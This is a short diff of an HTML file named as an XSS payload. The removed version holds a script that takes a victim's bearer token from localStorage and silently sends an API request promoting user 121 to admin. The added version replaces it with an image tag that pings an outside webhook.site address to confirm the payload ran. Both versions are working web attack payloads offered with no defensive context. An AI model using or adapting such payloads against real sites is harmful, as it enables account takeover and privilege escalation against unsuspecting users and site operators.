--- a/xss_paylof.html
+++ b/xss_paylof.html
@@ -1,15 +1,1 @@
-<!DOCTYPE html>
-<html>
-  <body>
-    <script>
-      fetch("/api/admin/users/121", {
-        method: "PUT",
-        headers: {
-          "Content-Type": "application/json",
-          "Authorization": "Bearer " + localStorage.getItem("token")  // Hoặc cookie nếu hệ thống dùng cookie auth
-        },
-        body: JSON.stringify({ role: "admin" })
-      });
-    </script>
-  </body>
-</html>
+<img src="https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?ping=admin">
